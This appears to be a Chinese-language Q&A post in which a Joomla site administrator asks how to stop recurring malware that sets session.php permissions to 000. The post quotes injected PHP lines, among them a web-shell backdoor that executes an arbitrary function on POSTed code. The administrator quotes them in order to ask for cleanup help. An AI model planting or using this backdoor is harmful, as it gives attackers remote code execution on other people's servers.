【发布时间】:2016-12-07 16:27:40
【问题描述】:
我们的一个网站每天都给出错误 500,在检查错误日志后,我发现 /home/cadactdi/public_html/libraries/joomla/session/session.php 中的文件的权限自行更改为 000 .
查看实用程序端口 80,我发现会话文件被某种病毒感染,但没有关于如何清除它的详细信息。
因此,由于无法进行更新,因此我每天都在自己更改权限,但第二天它们又回到了 000。
我阅读了会话文件,发现文件开头有如下一段代码:
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"]=@preg_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"]=@preg_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
所以我删除了这些行,这次病毒扫描程序没有发现任何威胁,我认为它已修复,但是,我不确定这是否会再次发生,是否有任何病毒可以修改该文件并如何预防。
有人遇到过同样的问题吗?有哪些建议?
感谢您的帮助!
【问题讨论】:
标签: session joomla permissions malware virus